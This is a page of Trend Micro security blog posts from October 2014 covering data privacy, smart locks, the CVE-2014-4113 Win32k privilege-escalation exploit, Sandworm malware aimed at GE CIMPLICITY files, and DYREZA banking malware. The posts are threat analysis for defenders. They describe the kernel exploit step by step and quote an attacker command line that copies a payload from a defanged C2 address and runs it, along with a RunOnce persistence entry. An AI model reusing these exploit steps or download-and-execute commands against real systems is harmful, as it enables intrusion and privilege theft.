Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
     1234
    567891011
    12131415161718
    19202122232425
    262728293031  
  • About Us

    Recent data breaches in big enterprises like large banks and retail chains make one thing clear: data privacy and protection is a concern for all organizations, not just large ones. If  large enterprises with plenty of available resources can be affected by attacks and lose their data, smaller organizations without these resources are at risk as well.

    Users are not just worried about whether their data is secure; today they are also worrying if their data will be used properly by the sites and businesses they deal with. The concern among users about privacy has increased in months and years.

    The statistics bear this all out. A survey carried out in March 2014 by the market research firm GfK highlighted significant, and growing, concerns from consumers about their personal data. 49% of respondents said they were “very much” concerned about how their data was protected, with 60% of respondents saying this concern had increased in the past 12 months.

    Consumers are also taking action. A 2014 study by Radius Global found that 69% of survey respondents would do less business with a company they knew had been breached; 67% would try to only do business with companies that they feel can handle their data. The consequences for companies are clear.

    So, what should companies do? First of all, they need to recognize that data protection is now an important a part of doing business. This means that they must actually approach this as something that is important, and not just a pain that has to be tolerated.

    To do this, organizations should first take stock and remember just what they are protecting and consider what’s most important – i.e., what is their core data. These should be protected with the best available resources. Keep in mind that the levels of protection necessary can change, depending on regulations (like the soon-to-be-implemented data protection regulations in the European Union).

    Local regulations on data protection can vary significantly. In the United States, there are no comprehensive law that covers all sectors. Instead, per-industry legislation such as the Health Insurance Portability and Accountability Act (HIPAA) are in place.

    In other countries, more comprehensive regulations that cover all sectors are more common. For example, countries in the European Union will soon be covered by the EU General Data Protection Regulation, which mandates EU-wide rules on data protection. Japan has similar laws in the form of the Act on the Protection of Personal Information, which dates back to 2003.

    However, not all organizations actually understand these regulations: in the EU, only 13% of businesses called their understanding of the upcoming regulations “very good”.  This is despite the fact that, for example, in the EU businesses can be fined up to 5% of their annual turnover if they are in violation of the proposed regulations.

    Similar approaches need to be taken to assuage concerns about privacy. Ensure that what data is being collected is used correctly and in such a way as not to be perceived as “creepy” by end users. The same data protection that is done for core data must be applied here, too: end users will not take kindly to businesses that don’t protect the data of their customers.

    In the end, data protection comes down not just to technical aspects, but for organizations to decide that it matters. With the new year fast approaching, companies can learn from the many incidents of 2014 and ensure that their own organizations do not fall victim to similar attacks. To know more about data protection law, read our infographic, The Road to Compliance: A Visual Guide to the EU Data Protection Law.

    Trend Micro secures user’s data via its integrated data loss prevention technology that protects data found in endpoints, servers, networks, and even the cloud. It also protects the transfer of data between locations and comes with a central policy management, which does not require installation of different technologies across multiple security layers.

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    Security is one of the top concerns when consumers consider buying smart devices. With cybercrime making the headlines every day, one has to think: is this smart device vulnerable to cyber attacks? Are these technologies secure enough for us to rely on them in our everyday lives?

    A good example of a technology that we need to assess for its security and reliability is the smart lock. One of the key characteristics of smart locks is the use of digital door keys, which are used to open them. Digital door keys are typically stored in the vendors cloud servers, along with other properties of the lock. This gives the owner great convenience, since they can “send” the keys to other people remotely in order to allow them temporary access.  It also enables the user to do comprehensive monitoring/reporting, for example, to detect any forced entry, to report any breakage to the lock, to send alerts to the user, etc.

    Smart locks, however, raise certain security risks as well. For instance, attackers may choose to target the vendor’s cloud servers, which may exist anywhere in the world, to get access to key information. Or if the smart lock supports web access, the attacker may attack the portal through code injection, cross-site scripting, etc. They may also launch phishing attacks to be able to get the user’s credentials to the vendor’s web portal used to manage the lock.

    The attackers can also target the communication between the owner’s smart lock and mobile device. Bluetooth Low Energy (BLE) is a popular protocol used for communication between the smart door lock and mobile device or mobile key fob. During the communication process, the digital key is sent from mobile phone to door lock over the air via BLE. The said communication is encrypted, but certain implementations can be subject to man-in-the middle (MITM) attack, as discussed in security community. Since this type of attack requires capturing of packet exchange during device setup, the time window for attack is short which reduces the attack surface significantly. However, it’s up to the vendor to provide a strong BLE security implementation.

    Some brands of smart locks allow user to lock/unlock anywhere in the world.  You can use vendor mobile app, or vendor web portal to check the lock status and lock/unlock it with a click of a finger.  This can be a desired feature for many consumers because of the ease and convenience it offers. The feature, however, does increase the attack surface.  In this case, instead of using BLE, the commands to the smart lock are sent over the Internet to the home router, and then to the lock via home Wi-Fi network, the smart lock device is visible in the local area network. Traditional IP based attacks such as port scanning and remote attack via open ports/firmware vulnerabilities can be used to attack the device.

    The Internet of Everything revolutionizes traditional hardware functionalities. While it creates security challenges, it also provides great opportunities. In the smart lock case, one can implement comprehensive monitoring/reporting, for example, to detect any force entry, broke of lock, send alert to user along with broken lock picture, and attacker picture, etc.  For critical IoE devices (such as door lock in a home), comprehensive monitoring/reporting is important to ensure software and hardware integrity to detect any malicious software/hardware attacks.

    For more detailed discussion on consumer buyer’s guide for smart home devices, you can read our Security Considerations for Consumers Buying Smart Home Devices.

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.

    This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems.

    The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

    CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions.

    With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system.

    The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    • 70857e02d60c66e27a173f8f292774f1
    • f9f01ce747679b82723b989d01c4d927

    We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

    Everything you need to know about the Win32k.sys vulnerability

    Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys.

    Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk.

    In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code:

    xxxHandleMenuMessages()

    {

    tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
    …   //without checking if the return value is a valid address
    xxxSendMessage(pwnd,…);

    }

    Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will  see how the sample exploits this vulnerability in kernel-mode in the next section.

    Below are the key steps or description on how the exploit occurs:

    • Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
    • Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code.
    • Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
    • Create a child process with SYSTEM privileges of the assigned program

    The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

    1. Create a window and 2-level popup menu.
    2.  Hook that window’s wndproc call.
    3. Track popup menu on the window and enter hook callback.
    4. In the hook callback, it changes wndproc of the menu to another callback.
    5.  In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX)
    6. Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5

    Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process.

    cv4113_snippet

    Figure 1. Code snippet of the sample

    From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable.

    With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public.

    During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

    Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

    Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode.  As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    On October 14th, a report was publicly released regarding the Sandworm team.  After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite.   We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.  As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

    Figure 1. Strings showing environment variable

    CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

    Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

    Figure 2. Sample SCADA System

    It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

    What Drew Our Attention?

    When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

    One of the C2’s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

    Figure 3. CimView/CimEdit Example

    In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

    The handler of OnOpenExecCommand is the following command line:

    cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

    It’s important to note the variable %CIMPATH% is used for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.

    We currently do not have a sample of newsfeed.xml or {random 41 character hex string}.wsf that can be analyzed for further detail. This event mechanism does not seem to exploit vulnerabilities; it’s comparable to AutoOpen and AutoExec in Microsoft Office.

    In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim (MD5: 59e41a4cdf2a7d37ac343d0293c616b7), which is a Cimpack Design Drawing File.

    The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

    • exec
    • lexec
    • die
    • getup
    • turnoff
    • chprt

    In addition to config.bak and default.txt being of interest, another file – shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d) drew our attention. It is a script designed to run in the Basic Control Engine; .bcl files are used heavily throughout SCADA systems to automate certain functions. In Cimplicity, .bcl files are used for creating scripts to help automate functions. Shell.bcl executes 94[.1[85[.]85[.]122\public\xv.exe directly.

    Based on the strings in shell.bcl, xv.exe is supposed to exploit the system vulnerability. We don’t currently have a copy or hash for xv.exe or Flashplayerapp.exe available to confirm this assumption.

    Open Directories

    During the course of regular threat intelligence gathering, we often look closely at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.

    In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.

    Spiskideputatovdone.ppsx (MD5: 330e8d23ab82e8a0ca6d166755408eb1), which means deputy list in Russian, has been tied to an email address oleh.tiahnybok@vosvoboda.info based on VirusTotal submissions. This file is a PPSX file that downloads/loads  94[.]185[.]85[.]122\public\slide1.gif and 94[.]185[.]85[.]122\public\slides.inf (MD5: 8313034e9ab391df83f6a4f242ec5f8d). The downloaded file slide.inf renames the local file slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install=”{dir}\slide1.gif.exe”. Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

    Slide1.gif.exe (MD5: 8a7c30a7a105bd62ee71214d268865e3) drops FONTCACHE.DAT  (MD5: 2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands on the system:

    • delete
    • ldplg
    • unlplg
    • update
    • dexec
    • exec
    • updcfg

    Conclusion

    As we have seen, these are pieces of a very complex targeted attack that is seemingly focused on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.

    As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the name BKDR_BLACKEN.A and BKDR_BLACKEN.B.

    Special thanks to the entire Forward-Looking Threat Research Team, Christopher Daniel So, Mark Joseph Manahan and the Ottawa Deep Security Labs

    Update as of October 17, 2014, 12:35 A.M.

    An earlier version of this post included several incorrect hashes. These have now been corrected.

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up-to-date.

    We recently spotted DYREZA malware leveraging an old vulnerability found existing in Adobe Reader and Acrobat and covered under CVE-2013-2729. Accordingly, once this vulnerability is successfully exploited it could lead to the execution of arbitrary code on the affected system.

    spam_dyrebitcoin1

    spam_dyrebitcoin2

    Figures 1-2. Screenshots of spam emails

    DYREZA malware uses spammed message that purports to be an invoice notification as its infection vector. It has a malicious .PDF file attachment, detected by Trend Micro as TROJ_PIDIEF.YYJU. When executed, it exploits the CVE-2013-2729 vulnerability, which leads to the download of TSPY_DYRE.EKW, a variant of DYREZA (also known as DYRE and DYRANGES).

    DYREZA is a malware known for stealing banking credentials and associated with parcel mule scams. We recently wrote a blog post detailing the role that this malware plays in the threat landscape ecosystem and some of its notable behavior, including its capability to perform man-in-the-middle (MITM) attacks via browser injections, monitoring online banking sessions of targeted banks, and stealing other information such as browser versions, snapshots, and personal certificates.

    Users and enterprises are at risk since DYREZA can get other types of data such as personal identifiable information (PII) and credentials via browser snapshots. Aside from this, we also reported that the CUTWAIL botnet leads to the download of both UPATRE and DYRE malware.

    What makes TSPY_DYRE.EKW notable is its ability to steal crucial information via injecting malicious codes onto certain banking and bitcoin login webpages.  Some of the bitcoin pages it monitors are:

    • bitbargain.co.uk/*
    • bitbargain.co.uk/login*
    • bitpay.com/*
    • bitpay.com/merchant-login*
    • localbitcoins.com/*
    • localbitcoins.com/accounts/login*
    • www.bitstamp.net/*
    • www.bitstamp.net/account/login*

    Apart from its information stealing routines, TSPY_DYRE.EKW has the capability to connect to certain malicious websites to send and receive information. Moreover, it can connect to specific STUN (Session Traversal Utilities for NAT) servers to determine the public IP address of the compromised computer. As such, cybercriminals can find out the location of the malware or possibly determine the affected users’ and organizations’ locations. The top country victims are Ireland, United States, Canada, Great Britain, and Netherlands.

    Bitcoin is a digital currency that has real world value. Cybercriminals often go after bitcoins since it presents a new venue for them to generate profit. While this is not the first instance that scammers and cybercriminals target bitcoins, this new attack highlights how traditional threats like exploits and banking malware remain to be a relevant means for cybercriminals to steal both user credentials and hit a relatively new platform – bitcoins.  It also teaches us an important lesson about keeping systems and software applications updated to its latest version.

    Trend Micro protects users from this threat via its Smart Protection Network that detects the spammed message and all related malware.

    With additional analysis from Rhena Inocencio, Karla Agregada, and Michael Casayuran

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  



     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice